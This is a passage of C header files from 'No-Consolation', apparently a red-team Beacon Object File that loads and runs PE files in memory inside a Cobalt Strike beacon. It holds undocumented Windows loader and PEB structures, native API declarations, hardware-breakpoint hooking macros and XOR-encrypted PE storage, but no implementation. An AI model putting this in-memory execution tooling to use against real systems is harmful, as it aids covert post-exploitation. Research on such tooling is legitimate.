    LDRP_CSLIST IncomingDependencies;
    LDR_DDAG_STATE State;
    SINGLE_LIST_ENTRY CondenseLink;
    ULONG PreorderNumber;
} LDR_DDAG_NODE, *PLDR_DDAG_NODE;

typedef BOOLEAN (NTAPI *PLDR_INIT_ROUTINE)(
    _In_ PVOID DllHandle,
    _In_ ULONG Reason,
    _In_opt_ PVOID Context
);

typedef enum _LDR_HOT_PATCH_STATE
{
    LdrHotPatchBaseImage = 0,
    LdrHotPatchNotApplied = 1,
    LdrHotPatchAppliedReverse = 2,
    LdrHotPatchAppliedForward = 3,
    LdrHotPatchFailedToPatch = 4,
    LdrHotPatchStateMax = 5
} LDR_HOT_PATCH_STATE;

typedef struct _LDR_DATA_TABLE_ENTRY2
{
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    union
    {
        LIST_ENTRY InInitializationOrderLinks;
        LIST_ENTRY InProgressLinks;
    };
    PVOID DllBase;
    PLDR_INIT_ROUTINE EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    union
    {
        UCHAR FlagGroup[4];
        ULONG Flags;
        struct
        {
            ULONG PackagedBinary : 1;
            ULONG MarkedForRemoval : 1;
            ULONG ImageDll : 1;
            ULONG LoadNotificationsSent : 1;
            ULONG TelemetryEntryProcessed : 1;
            ULONG ProcessStaticImport : 1;
            ULONG InLegacyLists : 1;
            ULONG InIndexes : 1;
            ULONG ShimDll : 1;
            ULONG InExceptionTable : 1;
            ULONG ReservedFlags1 : 2;
            ULONG LoadInProgress : 1;
            ULONG LoadConfigProcessed : 1;
            ULONG EntryProcessed : 1;
            ULONG ProtectDelayLoad : 1;
            ULONG ReservedFlags3 : 2;
            ULONG DontCallForThreads : 1;
            ULONG ProcessAttachCalled : 1;
            ULONG ProcessAttachFailed : 1;
            ULONG CorDeferredValidate : 1;
            ULONG CorImage : 1;
            ULONG DontRelocate : 1;
            ULONG CorILOnly : 1;
            ULONG ChpeImage : 1;
            ULONG ReservedFlags5 : 2;
            ULONG Redirected : 1;
            ULONG ReservedFlags6 : 2;
            ULONG CompatDatabaseProcessed : 1;
        };
    };
    USHORT ObsoleteLoadCount;
    USHORT TlsIndex;
    LIST_ENTRY HashLinks;
    ULONG TimeDateStamp;
    struct _ACTIVATION_CONTEXT *EntryPointActivationContext;
    PVOID Lock; // RtlAcquireSRWLockExclusive
    PLDR_DDAG_NODE DdagNode;
    LIST_ENTRY NodeModuleLink;
    struct _LDRP_LOAD_CONTEXT *LoadContext;
    PVOID ParentDllBase;
    PVOID SwitchBackContext;
    RTL_BALANCED_NODE BaseAddressIndexNode;
    RTL_BALANCED_NODE MappingInfoIndexNode;
    ULONG_PTR OriginalBase;
    LARGE_INTEGER LoadTime;
    ULONG BaseNameHashValue;
    LDR_DLL_LOAD_REASON LoadReason;
    ULONG ImplicitPathOptions;
    ULONG ReferenceCount;
    ULONG DependentLoadFlags;
    UCHAR SigningLevel; // since REDSTONE2
    ULONG CheckSum;
    VOID* ActivePatchImageBase;
    enum _LDR_HOT_PATCH_STATE HotPatchState;
} LDR_DATA_TABLE_ENTRY2, *PLDR_DATA_TABLE_ENTRY2;

typedef struct _PEB2
{
    BOOLEAN InheritedAddressSpace;
    BOOLEAN ReadImageFileExecOptions;
    BOOLEAN BeingDebugged;
    union
    {
        BOOLEAN BitField;
        struct
        {
            BOOLEAN ImageUsesLargePages : 1;
            BOOLEAN IsProtectedProcess : 1;
            BOOLEAN IsImageDynamicallyRelocated : 1;
            BOOLEAN SkipPatchingUser32Forwarders : 1;
            BOOLEAN IsPackagedProcess : 1;
            BOOLEAN IsAppContainer : 1;
            BOOLEAN IsProtectedProcessLight : 1;
            BOOLEAN IsLongPathAwareProcess : 1;
        };
    };

    HANDLE Mutant;

    PVOID ImageBaseAddress;
    PPEB_LDR_DATA2 Ldr;
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
    PVOID SubSystemData;
    PVOID ProcessHeap;
    PRTL_CRITICAL_SECTION FastPebLock;
    PSLIST_HEADER AtlThunkSListPtr;
    PVOID IFEOKey;

    union
    {
        ULONG CrossProcessFlags;
        struct
        {
            ULONG ProcessInJob : 1;
            ULONG ProcessInitializing : 1;
            ULONG ProcessUsingVEH : 1;
            ULONG ProcessUsingVCH : 1;
            ULONG ProcessUsingFTH : 1;
            ULONG ProcessPreviouslyThrottled : 1;
            ULONG ProcessCurrentlyThrottled : 1;
            ULONG ProcessImagesHotPatched : 1; // REDSTONE5
            ULONG ReservedBits0 : 24;
        };
    };
    union
    {
        PVOID KernelCallbackTable;
        PVOID UserSharedInfoPtr;
    };
    ULONG SystemReserved;
    ULONG AtlThunkSListPtr32;
    PAPI_SET_NAMESPACE ApiSetMap;
    ULONG TlsExpansionCounter;
    PVOID TlsBitmap;
    ULONG TlsBitmapBits[2];

    PVOID ReadOnlySharedMemoryBase;
    PVOID SharedData; // HotpatchInformation
    PVOID *ReadOnlyStaticServerData;

    PVOID AnsiCodePageData; // PCPTABLEINFO
    PVOID OemCodePageData; // PCPTABLEINFO
    PVOID UnicodeCaseTableData; // PNLSTABLEINFO

    ULONG NumberOfProcessors;
    ULONG NtGlobalFlag;

    ULARGE_INTEGER CriticalSectionTimeout;
    SIZE_T HeapSegmentReserve;
    SIZE_T HeapSegmentCommit;
    SIZE_T HeapDeCommitTotalFreeThreshold;
    SIZE_T HeapDeCommitFreeBlockThreshold;

    ULONG NumberOfHeaps;
    ULONG MaximumNumberOfHeaps;
    PVOID *ProcessHeaps; // PHEAP

    PVOID GdiSharedHandleTable;
    PVOID ProcessStarterHelper;
    ULONG GdiDCAttributeList;

    PRTL_CRITICAL_SECTION LoaderLock;

    ULONG OSMajorVersion;
    ULONG OSMinorVersion;
    USHORT OSBuildNumber;
    USHORT OSCSDVersion;
    ULONG OSPlatformId;
    ULONG ImageSubsystem;
    ULONG ImageSubsystemMajorVersion;
    ULONG ImageSubsystemMinorVersion;
    ULONG_PTR ActiveProcessAffinityMask;
    GDI_HANDLE_BUFFER GdiHandleBuffer;
    PVOID PostProcessInitRoutine;

    PVOID TlsExpansionBitmap;
    ULONG TlsExpansionBitmapBits[32];

    ULONG SessionId;

    ULARGE_INTEGER AppCompatFlags;
    ULARGE_INTEGER AppCompatFlagsUser;
    PVOID pShimData;
    PVOID AppCompatInfo; // APPCOMPAT_EXE_DATA

    UNICODE_STRING CSDVersion;

    PVOID ActivationContextData; // ACTIVATION_CONTEXT_DATA
    PVOID ProcessAssemblyStorageMap; // ASSEMBLY_STORAGE_MAP
    PVOID SystemDefaultActivationContextData; // ACTIVATION_CONTEXT_DATA
    PVOID SystemAssemblyStorageMap; // ASSEMBLY_STORAGE_MAP

    SIZE_T MinimumStackCommit;

    PVOID SparePointers[4]; // 19H1 (previously FlsCallback to FlsHighIndex)
    ULONG SpareUlongs[5]; // 19H1
    //PVOID* FlsCallback;
    //LIST_ENTRY FlsListHead;
    //PVOID FlsBitmap;
    //ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)];
    //ULONG FlsHighIndex;

    PVOID WerRegistrationData;
    PVOID WerShipAssertPtr;
    PVOID pUnused; // pContextData
    PVOID pImageHeaderHash;
    union
    {
        ULONG TracingFlags;
        struct
        {
            ULONG HeapTracingEnabled : 1;
            ULONG CritSecTracingEnabled : 1;
            ULONG LibLoaderTracingEnabled : 1;
            ULONG SpareTracingBits : 29;
        };
    };
    ULONGLONG CsrServerReadOnlySharedMemoryBase;
    PRTL_CRITICAL_SECTION TppWorkerpListLock;
    LIST_ENTRY TppWorkerpList;
    PVOID WaitOnAddressHashTable[128];
    PVOID TelemetryCoverageHeader; // REDSTONE3
    ULONG CloudFileFlags;
    ULONG CloudFileDiagFlags; // REDSTONE4
    CHAR PlaceholderCompatibilityMode;
    CHAR PlaceholderCompatibilityModeReserved[7];
    struct _LEAP_SECOND_DATA *LeapSecondData; // REDSTONE5
    union
    {
        ULONG LeapSecondFlags;
        struct
        {
            ULONG SixtySecondEnabled : 1;
            ULONG Reserved : 31;
        };
    };
    ULONG NtGlobalFlag2;
} PEB2, *PPEB2;

typedef struct _NT_TIB2
{
    struct _EXCEPTION_REGISTRATION_RECORD* ExceptionList;                   //0x0
    VOID* StackBase;                                                        //0x8
    VOID* StackLimit;                                                       //0x10
    VOID* SubSystemTib;                                                     //0x18
    union
    {
        VOID* FiberData;                                                    //0x20
        ULONG Version;                                                      //0x20
    };
    VOID* ArbitraryUserPointer;                                             //0x28
    struct _NT_TIB2* Self;                                                   //0x30
} NT_TIB2,  *PNT_TIB2;

typedef struct _TEB2
{
    struct _NT_TIB2 NtTib;                                                   //0x0
    VOID* EnvironmentPointer;                                               //0x38
    struct _CLIENT_ID ClientId;                                             //0x40
    VOID* ActiveRpcHandle;                                                  //0x50
    VOID* ThreadLocalStoragePointer;                                        //0x58
    struct _PEB* ProcessEnvironmentBlock;                                   //0x60
    ULONG LastErrorValue;                                                   //0x68
    ULONG CountOfOwnedCriticalSections;                                     //0x6c
    VOID* CsrClientThread;                                                  //0x70
    VOID* Win32ThreadInfo;                                                  //0x78
    ULONG User32Reserved[26];                                               //0x80
    ULONG UserReserved[5];                                                  //0xe8
    VOID* WOW32Reserved;                                                    //0x100
    ULONG CurrentLocale;                                                    //0x108
    ULONG FpSoftwareStatusRegister;                                         //0x10c
    VOID* ReservedForDebuggerInstrumentation[16];                           //0x110
    VOID* SystemReserved1[30];                                              //0x190
    CHAR PlaceholderCompatibilityMode;                                      //0x280
    UCHAR PlaceholderHydrationAlwaysExplicit;                               //0x281
    CHAR PlaceholderReserved[10];                                           //0x282
    ULONG ProxiedProcessId;                                                 //0x28c
    // ...
} TEB2, *PTEB2;

typedef struct _INVERTED_FUNCTION_TABLE_ENTRY
{
    PVOID FunctionTable;
    PVOID ImageBase;
    ULONG SizeOfImage;
    ULONG SizeOfTable;
} INVERTED_FUNCTION_TABLE_ENTRY, *PINVERTED_FUNCTION_TABLE_ENTRY;

typedef struct _INVERTED_FUNCTION_TABLE_KERNEL_MODE
{
    ULONG CurrentSize;
    ULONG MaximumSize;
    volatile ULONG Epoch;
    UCHAR Overflow;
    struct _INVERTED_FUNCTION_TABLE_ENTRY TableEntry[256];
} INVERTED_FUNCTION_TABLE_KERNEL_MODE, *PINVERTED_FUNCTION_TABLE_KERNEL_MODE;

typedef enum _MEMORY_INFORMATION_CLASS
{
	MemoryBasicInformation,
	MemoryWorkingSetInformation,
	MemoryMappedFilenameInformation,
	MemoryRegionInformation,
	MemoryWorkingSetExInformation,
	MemorySharedCommitInformation,
	MemoryImageInformation,
	MemoryRegionInformationEx,
	MemoryPrivilegedBasicInformation,
	MemoryEnclaveImageInformation,
	MemoryBasicInformationCapped
} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;

typedef enum _SECTION_INHERIT
{
	ViewShare = 1,
	ViewUnmap = 2
} SECTION_INHERIT, *PSECTION_INHERIT;

WINBASEAPI NTSTATUS NTAPI   NTDLL$NtAllocateVirtualMemory(HANDLE ProcessHandle, PVOID * BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
WINBASEAPI NTSTATUS NTAPI   NTDLL$NtProtectVirtualMemory(HANDLE ProcessHandle, PVOID* BaseAddress, PSIZE_T NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection);
WINBASEAPI NTSTATUS NTAPI   NTDLL$NtFreeVirtualMemory(HANDLE ProcessHandle, PVOID* BaseAddress, PSIZE_T RegionSize, ULONG FreeType);
WINBASEAPI NTSTATUS NTAPI   NTDLL$NtFlushInstructionCache(HANDLE ProcessHandle, PVOID BaseAddress, ULONG FlushSize);
WINBASEAPI BOOLEAN NTSYSAPI NTDLL$RtlCreateUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
WINBASEAPI NTSTATUS NTAPI   NTDLL$NtClose(HANDLE Handle);
WINBASEAPI NTSTATUS NTAPI   NTDLL$RtlUnicodeStringToAnsiString(PANSI_STRING DestinationString, PCUNICODE_STRING SourceString, BOOLEAN AllocateDestinationString);
WINBASEAPI NTSTATUS NTAPI   NTDLL$NtQueryVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, MEMORY_INFORMATION_CLASS MemoryInformationClass, PVOID MemoryInformation, SIZE_T MemoryInformationLength, PSIZE_T ReturnLength);
WINBASEAPI NTSTATUS NTAPI   NTDLL$NtCreateThreadEx(PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG CreateFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PVOID AttributeList);
WINBASEAPI SIZE_T NTSYSAPI  NTDLL$RtlCompareMemory(VOID *Source1, VOID *Source2, SIZE_T Length);
WINBASEAPI NTSTATUS NTAPI   NTDLL$NtGetContextThread(HANDLE, PCONTEXT);
WINBASEAPI NTSTATUS NTAPI   NTDLL$NtSetContextThread(HANDLE, PCONTEXT);

WINBASEAPI WCHAR* __cdecl MSVCRT$wcscpy(WCHAR *strDestination,const WCHAR *strSource);
WINBASEAPI  int   __cdecl MSVCRT$_stricmp(const char *string1,const char *string2);
WINBASEAPI void   __cdecl MSVCRT$memset(void *dest, int c, size_t count);
WINBASEAPI PVOID  __cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
WINBASEAPI int    __cdecl MSVCRT$strncmp(const char *s1, const char *s2, size_t n);
WINBASEAPI int    __cdecl MSVCRT$wcscmp(const wchar_t *string1, const wchar_t *string2);

WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(VOID);
WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI BOOL   WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
WINBASEAPI DWORD  WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI BOOL   WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize);
WINBASEAPI BOOL   WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
WINBASEAPI LPWSTR WINAPI KERNEL32$GetCommandLineW(VOID);
WINBASEAPI LPWSTR WINAPI KERNEL32$GetCommandLineA(VOID);
WINBASEAPI BOOL   WINAPI KERNEL32$CreatePipe( PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize);
WINBASEAPI BOOL   WINAPI KERNEL32$QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount);
WINBASEAPI BOOL   WINAPI KERNEL32$QueryPerformanceFrequency(LARGE_INTEGER *lpFrequency);
WINBASEAPI BOOL   WINAPI KERNEL32$TerminateThread(HANDLE hthread, DWORD dwExitCode);
WINBASEAPI DWORD  WINAPI KERNEL32$WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
WINBASEAPI BOOL   WINAPI KERNEL32$PeekNamedPipe(HANDLE hNamedPipe, LPVOID lpBuffer, DWORD nBufferSize, LPDWORD lpBytesRead, LPDWORD lpTotalBytesAvail, LPDWORD lpBytesLeftThisMessage);
WINBASEAPI BOOL   WINAPI KERNEL32$FreeLibrary(HANDLE hLibModule);

#define NtAllocateVirtualMemory      NTDLL$NtAllocateVirtualMemory
#define NtProtectVirtualMemory       NTDLL$NtProtectVirtualMemory
#define NtFreeVirtualMemory          NTDLL$NtFreeVirtualMemory
#define NtFlushInstructionCache      NTDLL$NtFlushInstructionCache
#define RtlCreateUnicodeString       NTDLL$RtlCreateUnicodeString
#define NtClose                      NTDLL$NtClose
#define RtlUnicodeStringToAnsiString NTDLL$RtlUnicodeStringToAnsiString
#define NtQueryVirtualMemory         NTDLL$NtQueryVirtualMemory
#define NtCreateThreadEx             NTDLL$NtCreateThreadEx
#define RtlCompareMemory             NTDLL$RtlCompareMemory
#define NtGetContextThread           NTDLL$NtGetContextThread
#define NtSetContextThread           NTDLL$NtSetContextThread

#define wcscpy                       MSVCRT$wcscpy
#define _stricmp                     MSVCRT$_stricmp
#define memset                       MSVCRT$memset
#define memcpy                       MSVCRT$memcpy
#define strncmp                      MSVCRT$strncmp
#define wcscmp                       MSVCRT$wcscmp

#define GetProcessHeap               KERNEL32$GetProcessHeap
#define HeapAlloc                    KERNEL32$HeapAlloc
#define HeapFree                     KERNEL32$HeapFree
#define CreateFileA                  KERNEL32$CreateFileA
#define GetLastError                 KERNEL32$GetLastError
#define GetFileSizeEx                KERNEL32$GetFileSizeEx
#define ReadFile                     KERNEL32$ReadFile
#define GetCommandLineW              KERNEL32$GetCommandLineW
#define GetCommandLineA              KERNEL32$GetCommandLineA
#define CreatePipe                   KERNEL32$CreatePipe
#define QueryPerformanceCounter      KERNEL32$QueryPerformanceCounter
#define QueryPerformanceFrequency    KERNEL32$QueryPerformanceFrequency
#define TerminateThread              KERNEL32$TerminateThread
#define WaitForSingleObject          KERNEL32$WaitForSingleObject
#define PeekNamedPipe                KERNEL32$PeekNamedPipe
#define FreeLibrary                  KERNEL32$FreeLibrary


================================================
FILE: Execution-BOF/No-Consolation/include/console.h
================================================
#pragma once

#include <windows.h>

#include "entry.h"
#include "bofdefs.h"
#include "hwbp.h"
#include "utils.h"

#define STATUS_SUCCESS        0x00000000
//#define STATUS_INVALID_HANDLE 0xc0000008

// Structures invovled in parsing PEB

#define RTL_MAX_DRIVE_LETTERS 32

typedef UNICODE_STRING* PUNICODE_STRING;

typedef struct _RTL_DRIVE_LETTER_CURDIR {
    USHORT                  Flags;
    USHORT                  Length;
    ULONG                   TimeStamp;
    UNICODE_STRING          DosPath;
} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;


typedef struct _CURDIR
{
    UNICODE_STRING DosPath;
    HANDLE Handle;
} CURDIR, * PCURDIR;

typedef struct _uRTL_USER_PROCESS_PARAMETERS
{
    ULONG MaximumLength;
    ULONG Length;

    ULONG Flags;
    ULONG DebugFlags;

    HANDLE ConsoleHandle;
    ULONG ConsoleFlags;
    HANDLE StandardInput;
    HANDLE StandardOutput;
    HANDLE StandardError;

    CURDIR CurrentDirectory;
    UNICODE_STRING DllPath;
    UNICODE_STRING ImagePathName;
    UNICODE_STRING CommandLine;
    PVOID Environment;

    ULONG StartingX;
    ULONG StartingY;
    ULONG CountX;
    ULONG CountY;
    ULONG CountCharsX;
    ULONG CountCharsY;
    ULONG FillAttribute;

    ULONG WindowFlags;
    ULONG ShowWindowFlags;
    UNICODE_STRING WindowTitle;
    UNICODE_STRING DesktopInfo;
    UNICODE_STRING ShellInfo;
    UNICODE_STRING RuntimeData;
    RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];

    ULONG EnvironmentSize;
    ULONG EnvironmentVersion;
    PVOID PackageDependencyData; //8+
    ULONG ProcessGroupId;
    // ULONG LoaderThreads;
} uRTL_USER_PROCESS_PARAMETERS, * uPRTL_USER_PROCESS_PARAMETERS;

// fd flag
#define _O_WRONLY 0x0001

// internal structure used by NtDeviceIoControlFile
typedef struct _CONSOLE_CP_INPUT {
    UINT32 Id1;
    UINT32 Id2;
} CONSOLE_CP_INPUT, * PCONSOLE_CP_INPUT;

// internal structure used by NtDeviceIoControlFile
typedef struct _CONSOLE_CP {
    PVOID InputValue;
    UINT32 unknown2;
    UINT32 unknown3;
    UINT32 InputSize;
    PCONSOLE_CP_INPUT InputType;
    UINT32 OutputSize;
    PVOID OutputPtr;
} CONSOLE_CP, * PCONSOLE_CP;

// internal structure used by AllocConsole/BasepCreateProcessParameters
typedef struct _CONSOLE_CONNECTION_STATE {
/*0x00 0x01*/ BYTE   Flags;
/*0x08 0x08*/ HANDLE ConsoleHandle;
/*0x10 0x08*/ HANDLE ConsoleReference;
/*0x18 0x08*/ HANDLE StandardInput;
/*0x20 0x08*/ HANDLE StandardOutput;
/*0x28 0x08*/ HANDLE StandardError;
/*0x30 0x01*/ BYTE   IsConnected;
} CONSOLE_CONNECTION_STATE, * PCONSOLE_CONNECTION_STATE;

// internal structure used by ucrtbase.dll
typedef struct _UCRTBASE_FILE {
/*0x00 0x08*/ PVOID  _ptr;
/*0x08 0x08*/ PVOID  _base;
/*0x10 0x04*/ UINT32 _cnt;
/*0x14 0x04*/ UINT32 _flags;
/*0x18 0x04*/ UINT32 _file;
/*0x1c 0x04*/ UINT32 _bufsiz;
/*0x20 0x08*/ PVOID  _charbuf;
/*0x28 0x08*/ LPSTR  _tmpfname;
/*0x30 0x28*/ CRITICAL_SECTION _lock;
} UCRTBASE_FILE, * PUCRTBASE_FILE;

BOOL redirect_std_out_err(
    IN PLOADED_PE_INFO peinfo);


================================================
FILE: Execution-BOF/No-Consolation/include/entry.h
================================================
#pragma once

#include <windows.h>

#define NC_HANDLE_INFO_KEY "NoConsolationHandleKey"
#define NC_SAVED_PE_KEY    "NoConsolationSavedPeKey"
#define NC_PE_INFO_KEY     "NoConsolationPeInfoKey"
#define NC_LOADED_DLL_KEY  "NoConsolationLoadedDllKey"
#define NC_MEM_STRUCTS_KEY "NoConsolationMemStructsKey"
#define NC_EXEC_CTX        "NoConsolationExecCtxKey"

#define MIN_XOR_KEY_LENGTH 16

typedef struct _MEMORY_STRUCTS {
    PVOID module_base_address_index;
    PVOID hash_table;
    PVOID ldrp_handle_tls_data;
    PVOID ldrp_release_tls_entry;
    PVOID console_connection_state;
} MEMORY_STRUCTS, * PMEMORY_STRUCTS;

typedef struct _SAVED_PE {
    CHAR    pe_name[MAX_PATH];
    PBYTE   pe_base;
    SIZE_T  pe_size;
    PBYTE   xor_key;
    ULONG32 xor_length;
    BOOL    encrypted;
    CHAR    loadtime[MAX_PATH];
    struct _SAVED_PE* next;
} SAVED_PE, * PSAVED_PE;

typedef struct _HANDLE_INFO {
    HANDLE hWrite;
    HANDLE hRead;
    int fo_msvc;
    int fo_ucrtbase;
} HANDLE_INFO, * PHANDLE_INFO;

typedef struct _LOADED_PE_INFO {
    CHAR         pe_name[MAX_PATH];
    WCHAR        pe_wname[MAX_PATH];
    WCHAR        pe_wpath[MAX_PATH];
    PVOID        pe_base;
    SIZE_T       pe_size;
    BOOL         loaded;
    LPWSTR       cmdwline;
    LPCSTR       cmdline;
    UINT32       timeout;
    BOOL         headers;
    LPSTR        method;
    BOOL         use_unicode;
    BOOL         nooutput;
    BOOL         alloc_console;
    BOOL         load_all_deps;
    LPSTR        load_all_deps_but;
    LPSTR        load_deps;
    LPSTR        search_paths;
    BOOL         custom_loaded;
    BOOL         load_in_progress;
    BOOL         handled_tls;
    //PLIB_LOADED  libs_loaded;
    PVOID        EntryPoint;
    PVOID        DllMain;
    PVOID        DllParam;
    BOOL         is_dll;
    BOOL         is_dependency;
    BOOL         loaded_msvcrt;
    BOOL         loaded_mscoree;
    BOOL         loaded_ucrtbase;
    HANDLE       hSection;
    HANDLE       hThread;
    PHANDLE_INFO Handles;
    HANDLE       hHwBp1;
    HANDLE       hHwBp2;
    BOOL         modified_msvc_stdout;
    BOOL         modified_msvc_stderr;
    BOOL         modified_ucrtbase_stdout;
    BOOL         modified_ucrtbase_stderr;
    BOOL         modified_user_params_stdout;
    BOOL         modified_user_params_stderr;
    BOOL         modified_console_reference;
    BOOL         modified_console_handle;
    HANDLE       original_user_params_stdout;
    HANDLE       original_user_params_stderr;
    HANDLE       original_console_reference;
    PVOID        console_reference_addr;
    PVOID        msvc_stdout;
    PVOID        msvc_stderr;
    PVOID        original_msvc_stdout;
    PVOID        original_msvc_stderr;
    PVOID        ucrtbase_stdout;
    PVOID        ucrtbase_stderr;
    PVOID        original_ucrtbase_stdout;
    PVOID        original_ucrtbase_stderr;
    HANDLE       original_console_handle;
    PVOID        func_table;
    BOOL         link_to_peb;
    BOOL         linked;
    PVOID        ldr_entry;
    BOOL         dont_unload;
    BOOL         inthread;
} LOADED_PE_INFO, * PLOADED_PE_INFO;

typedef struct _LIBS_LOADED {
    LIST_ENTRY list;
} LIBS_LOADED, * PLIBS_LOADED;

typedef struct _LIB_LOADED {
    LIST_ENTRY list;
    CHAR  name[MAX_PATH];
    PVOID address;
    PLOADED_PE_INFO peinfo;
} LIB_LOADED, * PLIB_LOADED;

typedef struct _EXEC_CTX {
    PVOID Rsp;
    PVOID Rbp;
    PVOID Rip;
    DWORD Tid;
} EXEC_CTX, * PEXEC_CTX;


================================================
FILE: Execution-BOF/No-Consolation/include/hwbp.h
================================================
#pragma once

#include <windows.h>

#define STATUS_UNSUCCESSFUL 0xC0000001

// debug register go from 0 to 3
#define NT_DEVICE_IO_CONTROL_FILE_INDEX 0
#define CREATE_FILE_INDEX               1

// hwbp related macros, simplify x64/x86 support

typedef LONG (CALLBACK* exception_callback)(PEXCEPTION_POINTERS);

#ifdef _WIN64
#define EXCEPTION_CODE(e) (e->ExceptionRecord->ExceptionCode)
#define EXCEPTION_CURRENT_IP(e) ((PVOID)e->ContextRecord->Rip)
#define EXCEPTION_SET_IP( e, p ) e->ContextRecord->Rip = p
#define EXCEPTION_SET_RET( e, r ) e->ContextRecord->Rax = r
#define EXCEPTION_RESUME( e ) e->ContextRecord->EFlags = ( 1 << 16 )
#define EXCEPTION_GET_RET( e ) *( PVOID* ) ( e->ContextRecord->Rsp )
#define EXCEPTION_ADJ_STACK( e, i ) e->ContextRecord->Rsp += i
#define EXCEPTION_ARG_1( e ) ( e->ContextRecord->Rcx )
#define EXCEPTION_ARG_2( e ) ( e->ContextRecord->Rdx )
#else
#define EXCEPTION_CODE( e ) (e->ExceptionRecord->ExceptionCode)
#define EXCEPTION_CURRENT_IP( e ) ((PVOID)e->ContextRecord->Eip)
#define EXCEPTION_SET_IP( e, p ) e->ContextRecord->Eip = p
#define EXCEPTION_SET_RET( e, r ) e->ContextRecord->Eax = r
#define EXCEPTION_RESUME( e ) e->ContextRecord->EFlags = ( 1 << 16 )
#define EXCEPTION_GET_RET( e ) *( PVOID* ) ( e->ContextRecord->Esp )
#define EXCEPTION_ADJ_STACK( e, i ) e->ContextRecord->Esp += i
#define EXCEPTION_ARG_1( e ) *(PVOID*)(e->ContextRecord->Esp + sizeof(PVOID))
#define EXCEPTION_ARG_2( e ) *(PVOID*)(e->ContextRecord->Esp + sizeof(PVOID)*2)
#endif

ULONG_PTR set_bits(
    ULONG_PTR dw,
    int lowBit,
    int bits,
    ULONG_PTR newValue);

VOID clear_breakpoint(
    IN CONTEXT* ctx,
    IN DWORD index);

BOOL enable_breakpoint(
    OUT CONTEXT* ctx,
    IN PVOID address,
    IN int index);

BOOL set_hwbp(
    IN HANDLE hThread,
    IN PVOID address,
    IN exception_callback hwbp_handler,
    IN UINT32 index,
    OUT PHANDLE phHwBpHandler);

VOID remove_hwbp_handler(
    IN HANDLE hHwBpHandler);


================================================
FILE: Execution-BOF/No-Consolation/include/loader.h
================================================
#pragma once

#include <windows.h>
#include <stdio.h>
#include <winternl.h>

#include "entry.h"
#include "utils.h"
#include "bofdefs.h"
#include "console.h"
#include "apisetlookup.h"

#ifdef _WIN64
#define MACHINE 0x8664
#else
#define MACHINE 0x14C
#endif

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
#define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 )

typedef NTSTATUS(__stdcall* STDCALL)(PLDR_DATA_TABLE_ENTRY);
typedef NTSTATUS(__thiscall* THISCALL)(PLDR_DATA_TABLE_ENTRY);

typedef struct _FP {
    union {
        STDCALL  stdcall;
        THISCALL thiscall;
        PVOID    ptr;
    };
} FP, *PFP;

typedef struct _IMAGE_RELOC {
    WORD offset :12;
    WORD type   :4;
} IMAGE_RELOC, *PIMAGE_RELOC;

typedef BOOL  (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
typedef BOOL  (WINAPI *Entry_t)(PVOID Param1, PVOID Param2, PVOID Param3);

// for setting the command line...
typedef CHAR**  (WINAPI *p_acmdln_t)(VOID);
typedef WCHAR** (WINAPI *p_wcmdln_t)(VOID);

BOOL SetCommandLineW(
    IN PCWSTR NewCommandLine);
BOOL IsExitAPI(
    IN PCHAR name);

// Relative Virtual Address to Virtual Address
#define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)

BOOL IsHeapPtr(
    IN LPVOID ptr);

BOOL IsReadable(
    IN LPVOID ptr);

VOID unload_dependency(
    IN PLOADED_PE_INFO peinfo);

PVOID handle_dependency(
    IN PLOADED_PE_INFO peinfo,
    IN LPSTR dll_name);

PVOID handle_import(
    IN PLOADED_PE_INFO peinfo,
    IN PVOID dll_base,
    IN LPSTR dll_name,
    IN LPSTR api_name);

BOOL load_pe(
    IN PVOID pedata,
    IN UINT32 pelen,
    IN OUT PLOADED_PE_INFO peinfo);


================================================
FILE: Execution-BOF/No-Consolation/include/output.h
================================================
#pragma once

#include "beacon.h"

 #define PRINT(...) { \
     BeaconPrintf(CALLBACK_OUTPUT_OEM, __VA_ARGS__); \
 }
 #define PRINT_ERR(...) { \
     BeaconPrintf(CALLBACK_ERROR, __VA_ARGS__); \
 }
#if defined(DEBUG)
 #define DPRINT(...) { \
